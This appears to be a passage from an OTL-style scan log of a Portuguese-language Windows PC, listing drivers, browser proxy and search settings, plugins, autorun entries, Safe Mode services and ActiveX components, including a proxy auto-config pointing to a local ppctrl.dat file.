DRV - [2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi)

DRV - [2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx)

DRV - [2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)

DRV - [2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)

DRV - [2013/10/21 14:12:37 | 000,178,304 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswVmm.sys -- (aswVmm)

DRV - [2013/10/21 14:12:37 | 000,079,720 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr)

DRV - [2013/10/21 14:12:37 | 000,049,944 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\System32\drivers\aswRvrt.sys -- (aswRvrt)

DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =

IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:20.0.1

FF - prefs.js..network.proxy.autoconfig_url: "file:///C:\\ProgramData\\ppctrl.dat"

FF - prefs.js..network.proxy.http: "189.112.117.5"

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2009/06/10 19:39:37 | 000,000,824 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)

O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (Microsoft Corporation)

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-1065731957-2128596916-2441434026-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

NetSvcs: FastUserSwitchingCompatibility - File not found

NetSvcs: Ias - C:\Windows\System32\ias.dll (Microsoft Corporation)

NetSvcs: Nla - File not found

NetSvcs: Ntmssvc - File not found

NetSvcs: NWCWorkstation - File not found

NetSvcs: Nwsapagent - File not found

NetSvcs: SRService - File not found

NetSvcs: WmdmPmSp - File not found

NetSvcs: LogonHours - File not found

NetSvcs: PCAudit - File not found

NetSvcs: helpsvc - File not found

NetSvcs: uploadmgr - File not found

MsConfig - StartUpReg: swg - hkey= - key= - C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Google Inc.)

MsConfig - State: "services" - 2

SafeBootMin: Base - Driver Group

SafeBootMin: Boot Bus estender - Driver Group

SafeBootMin: Boot file system - Driver Group

SafeBootMin: File system - Driver Group

SafeBootMin: Filter - Driver Group

SafeBootMin: HelpSvc - Service

SafeBootMin: NTDS - File not found

SafeBootMin: PCI Configuration - Driver Group

SafeBootMin: PNP Filter - Driver Group

SafeBootMin: Primary disk - Driver Group

SafeBootMin: sacsvr - Service

SafeBootMin: SCSI Class - Driver Group

SafeBootMin: System Bus estender - Driver Group

SafeBootMin: vmms - Service

SafeBootMin: WinDefend - C:\Arquivos de Programas\Windows Defender\MpSvc.dll (Microsoft Corporation)

SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers

SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive

SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive

SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller

SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc

SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard

SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse

SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters

SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter

SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System

SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive

SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy

SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers

SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume

SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices

SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices

SafeBootNet: Base - Driver Group

SafeBootNet: Boot Bus estender - Driver Group

SafeBootNet: Boot file system - Driver Group

SafeBootNet: File system - Driver Group

SafeBootNet: Filter - Driver Group

SafeBootNet: HelpSvc - Service

SafeBootNet: Messenger - Service

SafeBootNet: NDIS Wrapper - Driver Group

SafeBootNet: NetBIOSGroup - Driver Group

SafeBootNet: NetDDEGroup - Driver Group

SafeBootNet: Network - Driver Group

SafeBootNet: NetworkProvider - Driver Group

SafeBootNet: NTDS - File not found

SafeBootNet: PCI Configuration - Driver Group

SafeBootNet: PNP Filter - Driver Group

SafeBootNet: PNP_TDI - Driver Group

SafeBootNet: Primary disk - Driver Group

SafeBootNet: rdsessmgr - Service

SafeBootNet: sacsvr - Service

SafeBootNet: SCSI Class - Driver Group

SafeBootNet: Streams Drivers - Driver Group

SafeBootNet: System Bus estender - Driver Group

SafeBootNet: TDI - Driver Group

SafeBootNet: vmms - Service

SafeBootNet: WinDefend - C:\Arquivos de Programas\Windows Defender\MpSvc.dll (Microsoft Corporation)

SafeBootNet: WudfUsbccidDriver - Driver

SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers

SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive

SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive

SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller

SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc

SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard

SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse

SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net

SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient

SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService

SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans

SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters

SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter

SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System

SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive

SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers

SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy

SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers

SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume

SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices

SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices

SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices

ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun)

ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0

ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

ActiveX: {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache

ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack

ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework

ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE

ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx

ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help

ActiveX: {49C187D7-91E1-459E-9759-2925384BD397} - .NET Framework

ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6

ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools

ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements

ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player

ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access

ActiveX: {73FA19D0-2D75-11D2-995D-00C04F98BBC9} - Pastas da Web

ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7

ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework

ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll

